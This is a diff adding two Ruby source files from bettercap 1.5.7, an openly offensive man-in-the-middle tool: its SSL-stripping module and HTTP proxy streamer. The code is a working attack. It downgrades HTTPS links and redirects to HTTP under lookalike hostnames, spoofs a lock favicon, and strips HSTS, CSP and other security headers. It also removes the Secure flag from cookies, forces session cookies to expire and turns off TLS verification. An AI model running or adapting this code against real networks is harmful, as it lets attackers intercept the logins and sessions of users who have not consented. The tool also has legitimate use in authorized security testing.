xettercap 1.5.7xerob

data/lib/bettercap/proxy/http/sslstrip/strip.rb

@@ -0,0 +1,325 @@
+# encoding: UTF-8
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : http://www.evilsocket.net/
+
+This project is released under the GPL 3 license.
+
+=end
+
+module BetterCap
+module Proxy
+module HTTP
+module SSLStrip
+
+# Represent a stripped url associated to the client that requested it.
+class StrippedObject
+  # The stripped request client address.
+  attr_accessor :client
+  # The original URL.
+  attr_accessor :original
+  # The stripped version of the URL.
+  attr_accessor :stripped
+
+  # Known subdomains to replace.
+  SUBDOMAIN_REPLACES = {
+    'www'     => 'wwwww',
+    'webmail' => 'wwebmail',
+    'mail'    => 'wmail',
+    'm'       => 'wmobile'
+  }.freeze
+
+  # Create an instance with the given arguments.
+  def initialize( client, original, stripped )
+    @client   = client
+    @original = original
+    @stripped = stripped
+  end
+
+  # Return the #original hostname.
+  def original_hostname
+    URI::parse(@original).hostname
+  end
+
+  # Return the #stripped hostname.
+  def stripped_hostname
+    URI::parse(@stripped).hostname
+  end
+
+  # Return a normalized version of +url+.
+  def self.normalize( url, schema = 'https' )
+    # add schema if needed
+    unless url.include?('://')
+      url = "#{schema}://#{url}"
+    end
+    # add path if needed
+    unless url.end_with?('/')
+      url = "#{url}/"
+    end
+    url
+  end
+
+  # Downgrade +url+ from HTTPS to HTTP.
+  # Will take care of HSTS bypass urls in a near future.
+  def self.strip( url )
+    # first thing first, downgrade the protocol schema
+    stripped = url.gsub( 'https://', 'http://' )
+    # search for a known subdomain and replace it
+    found = false
+    SUBDOMAIN_REPLACES.each do |from,to|
+      if stripped.include?( "://#{from}." )
+        stripped = stripped.gsub( "://#{from}.", "://#{to}." )
+        found = true
+        break
+      end
+    end
+    # fallback, prepend custom 'wwwww.'
+    unless found
+      stripped.gsub!( '://', '://wwwww.' )
+    end
+
+    Logger.debug  "[#{'SSLSTRIP'.green} '#{url}' -> '#{stripped}'"
+
+    stripped
+  end
+
+  def self.process( url )
+    normalized = self.normalize(url)
+    stripped   = self.strip(normalized)
+    [ normalized, stripped ]
+  end
+end
+
+# Handle SSL stripping.
+class Strip
+  # Maximum number of redirects to detect a HTTPS redirect loop.
+  MAX_REDIRECTS = 3
+  # Regular expression used to parse HTTPS urls.
+  HTTPS_URL_RE  = /(https:\/\/[^"'\/]+)/i
+
+  # Create an instance of this object.
+  def initialize( ctx )
+    @stripped = []
+    @cookies  = CookieMonitor.new
+    @favicon  = Response.from_file( File.dirname(__FILE__) + '/lock.ico', 'image/x-icon' )
+    @resolver = BetterCap::Network::Servers::DNSD.new( nil, ctx.iface.ip, ctx.options.servers.dnsd_port )
+
+    @resolver.start
+  end
+
+  # Return true if the +request+ was stripped.
+  def was_stripped?(request)
+    url = request.base_url
+    @stripped.each do |s|
+      if s.client == request.client and s.stripped.start_with?(url)
+        return true
+      end
+    end
+    false
+  end
+
+  def unstrip( request, url )
+    @stripped.each do |s|
+      if s.client == request.client and s.stripped.start_with?(url)
+        return s.original
+      end
+    end
+    url
+  end
+
+  # Check if the +request+ is a result of a stripped link/redirect and handle
+  # cookies cleaning.
+  # Return a response object or nil if the request must be performed.
+  def preprocess( request )
+    process_headers!(request)
+    response = process_cookies!(request)
+    if response.nil?
+      process_stripped!(request)
+      response = spoof_favicon!(request)
+    end
+    response
+  end
+
+  # Process the +request+ and if it's a redirect to a HTTPS url patch the
+  # Location header and retry.
+  # Process the +response+ and replace every https link in its body with
+  # http counterparts.
+  def process( request, response )
+    # check for a redirect
+    if process_redirection!( request, response )
+      # retry the request
+      return true
+    end
+
+    process_headers!(response)
+    process_body!( request, response )
+
+    # do not retry the request.
+    false
+  end
+
+  private
+
+  # Headers to patch both in requests and responses.
+  HEADERS_TO_PATCH = {
+    :req => {
+      'Accept-Encoding'           => nil,
+      'If-None-Match'             => nil,
+      'If-Modified-Since'         => nil,
+      'Upgrade-Insecure-Requests' => nil,
+      'Pragma'                    => 'no-cache'
+    },
+
+    :res => {
+      'X-Frame-Options'           => nil,
+      'X-Content-Type-Options'    => nil,
+      'X-Xss-Protection'          => nil,
+      'Strict-Transport-Security' => nil,
+      'Content-Security-Policy'   => nil
+    }
+  }.freeze
+
+  # Clean some headers from +r+.
+  def process_headers!(r)
+    what = r.is_a?(BetterCap::Proxy::HTTP::Request) ? :req : :res
+    HEADERS_TO_PATCH[what].each do |key,value|
+      r[key] = value;
+    end
+  end
+
+  # If +request+ has unknown session cookies, create a client redirection
+  # to make them expire.
+  def process_cookies!(request)
+    response = nil
+    # check for cookies.
+    unless @cookies.is_clean?(request)
+      Logger.info "[#{'SSLSTRIP'.green} #{request.client}] Sending expired cookies for '#{request.host}'."
+      expired = @cookies.get_expired_headers!(request)
+      response = Response.redirect( request.to_url(nil), expired )
+    end
+    response
+  end
+
+  # If the +request+ is a result of a sslstripping operation,
+  # proxy it via SSL.
+  def process_stripped!(request)
+    if request.port == 80 and was_stripped?(request)
+      # i.e: wwww.facebook.com
+      stripped   = request['Host']
+      # i.e: http://wwww.facebook.com/
+      url        = StrippedObject.normalize( stripped, 'http' )
+      # i.e: www.facebook.com
+      unstripped = unstrip( request, url ).gsub( 'https://', '' ).gsub( 'http://', '' ).gsub( /\/.*/, '' )
+
+      # loop each header and fix the stripped url if needed,
+      # this will fix headers such as Host, Referer, Origin, etc.
+      request.headers.each do |name,value|
+        if value.include?(stripped)
+          request[name] = value.gsub( stripped, unstripped ).gsub( 'http://', 'https://')
+        end
+      end
+      request.port = 443
+
+      Logger.info "[#{'SSLSTRIP'.green} #{request.client}] Found stripped HTTPS link '#{url}', proxying via SSL ( #{request.to_url} )."
+    end
+  end
+
+  # If +request+ is the favicon of a stripped host, send our spoofed lock icon.
+  def spoof_favicon!(request)
+    if was_stripped?(request) and is_favicon?(request)
+      Logger.info "[#{'SSLSTRIP'.green} #{request.client}] Sending spoofed favicon '#{request.to_url }'."
+      return @favicon
+    end
+    nil
+  end
+
+  # Return true if +request+ is a favicon request.
+  def is_favicon?(request)
+    ( request.path.include?('.ico') or request.path.include?('favicon') )
+  end
+
+  # If the +response+ is a redirect to a HTTPS location, patch the +response+ and
+  # retry the +request+ via SSL.
+  def process_redirection!(request,response)
+    # check for a redirect
+    if response['Location'].start_with?('https://')
+      original, stripped = StrippedObject.process( response['Location'] )
+
+      add_stripped_object StrippedObject.new( request.client, original, stripped )
+
+      # If MAX_REDIRECTS is reached, the 'Location' header will be used.
+      response['Location'] = stripped
+
+      # no cookies set, just a normal http -> https redirect
+      if response['Set-Cookie'].empty?
+        Logger.info "[#{'SSLSTRIP'.green} #{request.client}] Found redirect to HTTPS '#{original}' -> '#{stripped}'."
+        # The request will be retried on port 443 if MAX_REDIRECTS is not reached.
+        request.port = 443
+        # retry the request if possible
+        return true
+      # cookies set, this is probably a redirect after a login.
+      else
+        Logger.info "[#{'SSLSTRIP'.green} #{request.client}] Found redirect to HTTPS ( with cookies ) '#{original}' -> '#{stripped}'."
+        # we know this session, do not kill it!
+        @cookies.add!( request )
+        # remove the 'secure' flag from every cookie.
+        # ref: https://www.owasp.org/index.php/SecureFlag
+        response.patch_header!( 'Set-Cookie', /secure/, '' )
+        # do not retry request
+        return false
+      end
+    end
+    false
+  end
+
+  # Process the +response+ body and strip out every HTTPS link.
+  def process_body!(request, response)
+    # parse body
+    links = []
+    begin
+      response.body.scan( HTTPS_URL_RE ).uniq.each do |link|
+        if link[0].include?('.')
+          # yeah, some idiots are using \ instead of / as a path -.-
+          if link[0].end_with?('\\')
+            link[0][-1] = '/'
+          end
+          links << StrippedObject.process( link[0] )
+        end
+      end
+    # handle errors due to binary content
+    rescue; end
+
+    unless links.empty?
+      Logger.info "[#{'SSLSTRIP'.green} #{request.client}] Stripping #{links.size} HTTPS link#{links.size > 1 ? 's' : ''} inside '#{request.to_url}'."
+
+      links.each do |l|
+        original, stripped = l
+        add_stripped_object StrippedObject.new( request.client, original, stripped )
+        response.body.gsub!( original, stripped )
+      end
+    end
+  end
+
+  private
+
+  def add_stripped_object( o )
+    begin
+      stripped_hostname = o.stripped_hostname
+      original_address  = IPSocket.getaddress( o.original_hostname )
+      @stripped << o
+      # make sure we're able to resolve the stripped domain
+      @resolver.add_rule!( stripped_hostname, original_address )
+    rescue Exception => e
+      Logger.exception(e)
+    end
+  end
+end
+
+end
+end
+end
+end

data/lib/bettercap/proxy/http/streamer.rb

@@ -0,0 +1,225 @@
+# encoding: UTF-8
+=begin
+
+BETTERCAP
+
+Author : Simone 'evilsocket' Margaritelli
+Email  : evilsocket@gmail.com
+Blog   : http://www.evilsocket.net/
+
+This project is released under the GPL 3 license.
+
+=end
+
+module BetterCap
+module Proxy
+module HTTP
+
+# Handle data streaming between clients and servers for the BetterCap::Proxy::HTTP::Proxy.
+class Streamer
+  # Initialize the class.
+  def initialize( sslstrip )
+    @ctx       = Context.get
+    @sslstrip  = SSLStrip::Strip.new( @ctx ) if sslstrip
+  end
+
+  # Return true if the +request+ was stripped.
+  def was_stripped?(request, client)
+    if @sslstrip
+      request.client, _ = get_client_details( client )
+      return @sslstrip.was_stripped?(request)
+    end
+    false
+  end
+
+  # Redirect the +client+ to a funny video.
+  def rickroll( client )
+    client_ip, client_port = get_client_details( client )
+
+    Logger.warn "#{client_ip}:#{client_port} is connecting to us directly."
+
+    client.write Response.redirect( "https://www.youtube.com/watch?v=dQw4w9WgXcQ" ).to_s
+  end
+
+  # Handle the HTTP +request+ from +client+.
+  def handle( request, client, redirects = 0 )
+    response = Response.new
+    request.client, _ = get_client_details( client )
+
+    Logger.debug "Handling #{request.method} request from #{request.client} ..."
+
+    begin
+      r = nil
+      if @sslstrip
+        r = @sslstrip.preprocess( request )
+      end
+
+      if r.nil?
+        # call modules on_pre_request
+        r = process( request )
+        if r.nil?
+          self.send( "do_#{request.method}", request, response )
+        else
+          Logger.info "[#{'PROXY'.green}] Module returned crafted response."
+          response = r
+        end
+      else
+        response = r
+      end
+
+      if response.textual? or request.method == 'DELETE'
+        StreamLogger.log_http( request, response )
+      else
+        Logger.debug "[#{request.client}] -> #{request.to_url} [#{response.code}]"
+      end
+
+      if @sslstrip
+        # do we need to retry the request?
+        if @sslstrip.process( request, response ) == true
+          # https redirect loop?
+          if redirects < SSLStrip::Strip::MAX_REDIRECTS
+            return self.handle( request, client, redirects + 1 )
+          else
+            Logger.info "[#{'SSLSTRIP'.red} #{request.client}] Detected HTTPS redirect loop for '#{request.host}'."
+          end
+        end
+      end
+
+      # Strip out a few security headers.
+      strip_security( response )
+
+      # call modules on_request
+      process( request, response )
+
+      client.write response.to_s
+    rescue NoMethodError => e
+      Logger.warn "Could not handle #{request.method} request from #{request.client} ..."
+      Logger.exception e
+    end
+  end
+
+  private
+
+  # Run proxy modules.
+  def process( request, response = nil )
+    # loop each loaded module and execute if enabled
+    BetterCap::Proxy::HTTP::Module.modules.each do |mod|
+      if mod.enabled?
+        # we need to save the original response in case something
+        # in the module will go wrong
+        original = response
+
+        begin
+          if response.nil?
+            r = mod.on_pre_request request
+            # the handler returned a response, do not execute
+            # the request
+            response = r unless r.nil?
+          else
+            mod.on_request request, response
+          end
+        rescue Exception => e
+          Logger.warn "Error with proxy module: #{e.message}"
+          Logger.exception e
+
+          response = original
+        end
+      end
+    end
+    return response
+  end
+
+  # List of security headers to remove/patch from any response.
+  # Thanks to Mazin Ahmed ( @mazen160 )
+  SECURITY_HEADERS = {
+    'X-Frame-Options'                     => nil,
+    'X-Content-Type-Options'              => nil,
+    'Strict-Transport-Security'           => nil,
+    'X-WebKit-CSP'                        => nil,
+    'Public-Key-Pins'                     => nil,
+    'Public-Key-Pins-Report-Only'         => nil,
+    'X-Content-Security-Policy'           => nil,
+    'Content-Security-Policy-Report-Only' => nil,
+    'Content-Security-Policy'             => nil,
+    'X-Download-Options'                  => nil,
+    'X-Permitted-Cross-Domain-Policies'   => nil,
+    'Allow-Access-From-Same-Origin'       => '*',
+    'Access-Control-Allow-Origin'         => '*',
+    'Access-Control-Allow-Methods'        => '*',
+    'Access-Control-Allow-Headers'        => '*',
+    'X-Xss-Protection'                    => '0'
+  }.freeze
+
+  # Strip out a few security headers from +response+.
+  def strip_security( response )
+    SECURITY_HEADERS.each do |name,value|
+      response[name] = value
+    end
+  end
+
+  # Return the +client+ ip address and port.
+  def get_client_details( client )
+    _, client_port, _, client_ip = client.peeraddr
+    [ client_ip, client_port ]
+  end
+
+  # Use a Net::HTTP object in order to perform the +req+ BetterCap::Proxy::HTTP::Request
+  # object, will return a BetterCap::Proxy::HTTP::Response object instance.
+  def perform_proxy_request(req, res)
+    path             = req.path
+    response         = nil
+    http             = Net::HTTP.new( req.host, req.port )
+    http.use_ssl     = ( req.port == 443 )
+    http.verify_mode = OpenSSL::SSL::VERIFY_NONE
+
+    http.start do
+      response = yield( http, path, req.headers )
+    end
+
+    res.convert_webrick_response!(response)
+  end
+
+  # Handle a CONNECT request, +req+ is the request object and +res+ the response.
+  def do_CONNECT(req, res)
+    Logger.error "You're using bettercap as a normal HTTP(S) proxy, it wasn't designed to handle CONNECT requests:\n\n#{req.to_s}"
+  end
+
+  # Handle a GET request, +req+ is the request object and +res+ the response.
+  def do_GET(req, res)
+    perform_proxy_request(req, res) do |http, path, header|
+      http.get(path, header)
+    end
+  end
+
+  # Handle a HEAD request, +req+ is the request object and +res+ the response.
+  def do_HEAD(req, res)
+    perform_proxy_request(req, res) do |http, path, header|
+      http.head(path, header)
+    end
+  end
+
+  # Handle a DELETE request, +req+ is the request object and +res+ the response.
+  def do_DELETE(req, res)
+    perform_proxy_request(req, res) do |http, path, header|
+      http.delete(path, header)
+    end
+  end
+
+  # Handle a POST request, +req+ is the request object and +res+ the response.
+  def do_POST(req, res)
+    perform_proxy_request(req, res) do |http, path, header|
+      http.post(path, req.body || "", header)
+    end
+  end
+
+  # Handle a PUT request, +req+ is the request object and +res+ the response.
+  def do_PUT(req, res)
+    perform_proxy_request(req, res) do |http, path, header|
+      http.put(path, req.body || "", header)
+    end
+  end
+
+end
+end
+end
+end